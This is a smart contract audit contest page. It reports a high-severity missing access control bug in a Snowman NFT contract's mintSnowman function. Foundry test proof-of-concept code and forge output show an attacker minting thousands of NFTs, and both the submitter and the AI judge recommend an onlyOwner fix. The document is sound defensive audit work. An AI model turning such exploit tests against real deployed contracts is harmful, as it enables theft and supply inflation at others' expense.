Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

`Snowman::mintSnowman` has no access control - anyone can mint unlimited NFTs

cymans

Root + Impact

Description

The Snowman::mintSnowman function is intended to only be called by the SnowmanAirdrop contract after a user stakes their Snow tokens and passes Merkle proof verification.
However, mintSnowman is an external function with no access control modifier. Any external account can call it directly to mint an unlimited number of Snowman NFTs to any address, completely bypassing the staking and airdrop mechanism.

// src/Snowman.sol

function mintSnowman(address receiver, uint256 amount) external { // @> no access control - anyone can call

for (uint256 i = 0; i < amount; i++) {

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

Risk

Likelihood:

Any user who reads the contract code can see mintSnowman has no restrictions.
A single transaction is enough to mint any number of NFTs.

Impact:

The entire Merkle airdrop system becomes meaningless since NFTs can be obtained without staking.
The NFT collection's value drops to zero as supply is unlimited.
The Snow token staking incentive is destroyed.

Proof of Concept

The attack is straightforward. The Snowman::mintSnowman function performs no caller verification, so any externally owned account (EOA) or contract can invoke it directly. The attacker does not need Snow tokens, does not need to be in the Merkle tree, and does not need a valid signature. They simply call the function with their address and a desired amount.

Step-by-step attack scenario:

Attacker deploys or interacts with the already-deployed Snowman contract.
Attacker calls snowman.mintSnowman(attackerAddress, 1000) directly.
The function has no onlyOwner, no address whitelist, and no check that msg.sender is the SnowmanAirdrop contract.
1000 Snowman NFTs are minted to the attacker for free, without staking any Snow tokens.
The attacker can repeat this unlimited times, inflating NFT supply indefinitely.

function testAnyoneCanMintSnowman() public {

address attacker = makeAddr("attacker");

// Step 1: Verify attacker has no Snow tokens and is not part of the airdrop

assertEq(snow.balanceOf(attacker), 0);

assertEq(snowman.balanceOf(attacker), 0);

// Step 2: Attacker directly calls mintSnowman - bypasses entire airdrop system

vm.prank(attacker);

snowman.mintSnowman(attacker, 1000);

// Step 3: Attacker now owns 1000 NFTs without ever staking or being in Merkle tree

assertEq(snowman.balanceOf(attacker), 1000);

// Step 4: Attacker can do it again - no limit

vm.prank(attacker);

snowman.mintSnowman(attacker, 5000);

assertEq(snowman.balanceOf(attacker), 6000);

}

Recommended Mitigation

Restrict the mintSnowman function so that only the authorized SnowmanAirdrop contract (the owner) can call it. The Snowman contract already inherits Ownable, so the simplest fix is to add the onlyOwner modifier. This ensures that NFTs can only be minted through the legitimate airdrop flow (Merkle proof + signature verification + Snow token staking), and no external actor can bypass the system.

- function mintSnowman(address receiver, uint256 amount) external {

+ function mintSnowman(address receiver, uint256 amount) external onlyOwner {

for (uint256 i = 0; i < amount; i++) {

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 4 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!